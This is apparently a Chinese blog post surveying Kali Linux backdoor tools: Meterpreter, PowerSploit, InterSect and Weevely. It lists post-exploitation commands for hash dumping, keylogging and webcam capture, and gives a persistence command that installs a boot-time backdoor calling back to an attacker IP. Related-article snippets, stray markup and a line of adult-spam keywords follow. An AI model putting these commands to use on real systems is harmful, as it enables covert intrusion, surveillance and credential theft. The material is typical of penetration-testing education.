<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    Kali Linux之常見后門工具介紹

    一顆小胡椒2022-06-25 06:56:48

    1、Meterpreter

    它是Metasploit框架中功能強大的后滲透模塊。可以通過Meterpreter的客戶端執行攻擊腳本,遠程調用目標主機上運行的Meterpreter服務端。

    命令 作用

    sessions 查看會話ID信息

    idletime 顯示目標主機截止當前無操作命令的時間

    webcam_snap 抓取目標主機的攝像頭,將拍攝的內容保存到本地

    run checkvm 檢查目標主機是否是虛擬機

    rdesktop 執行rdesktop -u username -p password ip 執行命令之后就會彈出一個窗口對目標進行控制

    hashdump 獲得密碼的hash值

    keylogrecorder 記錄鍵盤信息

    vnc 打開遠程目標桌面

    getsystem 目標系統權限提升

    Meterpreter相當于攻擊成功后駐留在內存中的Shellcode,為了保持長久的控制,metasplpoit提供了persistence和metsvc,模塊,用于在目標為windows系統上安裝開機運行或永久服務等后門。命令如下:

    meterpreter>run persistence -X -i 5 -p 2000 -r 192.168.1.101     #在注冊表中寫入開機啟動項,反向連接192.168.1.101:2000(攻擊者的ip和端口) -X表示開機啟動 ,-i表示反向連接間隔

    meterpreter>run metsvc     #安裝系統服務metsvc

    2、PowerSpoit

    基于PowerShell的后門集成框架。需要.Net環境支持。其主要模塊:

    1、CodeExecution 在目標主機執行代碼

    2、ScriptModification 在目標主機上創建或修改腳本

    3、Persistence 設置后門,開機啟動或安裝服務等

    4、AntivirusBypass 繞過殺毒軟件

    5、Exfiltration 在目標主機上進行信息搜集的工具

    6、Mayhem 藍屏等破壞性腳本

    7、Recon 以目標主機為跳板進行內網偵查

    3、InterSect

    是一個后滲透完成多種后期任務的Python程序。它能夠自動收集密碼文件和網絡信息,并且能夠識別殺毒軟件和防火墻程序。若需要使用它自動執行后期任務,需要創建自己的腳本文件,并在腳本中指定所需的各種功能,InterSect為每種功能提供對應的模塊,其包含的功能模塊:

    1、creds 收集認證信息

    2、extras 搜索操作系統和應用程序的配置文件,以檢索特定的應用程序和防護程序

    3、network 收集網絡信息,例如服務端口和dns信息

    4、lanmap 枚舉在線主機并收集ip地址

    5、osuser 枚舉操作系統信息

    6、openshares 在特定的主機上查找smb的公開共享

    7、portscan 簡易的端口掃描程序,可以掃描特定ip的1~1000端口

    8、egressbuster 在指定的端口范圍內,搜索可用的外聯端口

    9、privsec 檢測Linux內核的系統是否存在可提權漏洞

    10、xmlcrack 將哈希列表發送端遠程XMLRPC,以繼續破解

    11、reversexor 采用異或加密的reverse shell

    12、bshell 基于tcp協議的bind shell

    13、rshell 基于tcp協議的reverse shell

    14、xorshell 基于xor加密的bind shell

    15、aeshttp 采用aes算法加密的HTTP reverse shell

    16、udpbind 采用udp協議的bind shell,默認端口為 21541

    17、persistent 會在系統啟動時自動運行的持久型后門

    4、Weevely

    是一款功能強大的PHP后門工具,它使用HTTP協議包頭部進行指令傳輸。它的使用非常簡單,但僅支持php語言。

    建立后門:weevely generate #password為自己設置的后門連接密碼,path為存放生成的木馬文件路徑

    連接后門:weevely [cmd] #URL為后門地址,password為后門密碼,cmd為可選項,表示要執行的命令

    linux系統kali
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    Moriarty Corp靶場攻略
    2022-08-09 08:04:31
    靶場環境本次所使用的攻擊機為kalilinux系統,攻擊過程中涉及到的工具主要有:公網主機VPS,中國菜刀/中國螞劍,burpsuite,msf,MobaXterm,一句話木馬,proxychains,nmap,searchsploit,exp腳本等。每次提交flag后都會給相關提示和說明。開始滲透之前須向外網服務器提交flag{start},表示攻擊開始正常啟動。
    這個世界充滿了待解決的迷人問題,做一個黑客有很多樂趣,但是需要頗費氣力才能獲得這些樂趣。這些動力需要動機。
    靶場環境 本次所使用的攻擊機為kalilinux系統,攻擊過程中涉及到的工具主要有:公網主機VPS,中國菜刀/中國螞劍,burpsuite,msf,MobaXterm,一句話木馬,proxychains,nmap,searchsploit,exp腳本等。攻擊的拓撲結構如下圖所示。每次提交flag后都會給相關提示和說明。開始滲透之前須向外網服務器提交flag{start},表示攻擊開始正常啟動。
    系統安全第37篇普及Metasploit技術,希望您喜歡
    作為擁有著10年經驗的滲透安全測試工程師,一路也是從小白歷經磨難成長起來的我,給現在的新手小白一些建
    常見端口滲透總結
    2022-01-16 22:32:17
    這樣,客戶端就能命令FTP服務器發一個文件給被攻擊的服務。基于Linux系統,配置方面很簡單。在nfs配置中,有不做任何限制的,有限制用戶,有限制IP,以及在版本2.x中我們還可以使用證書來驗證用戶。當然不同的限制可以采用的攻擊方式也不一樣;就目前而言網上關于nfs的攻擊還是比較少的!但是畢竟主流的攻擊方式仍舊是那些,比如注入,未授權等等;這些問題的出現也都是因為配置不當而造成的。
    一顆小胡椒
    暫無描述
      亚洲 欧美 自拍 唯美 另类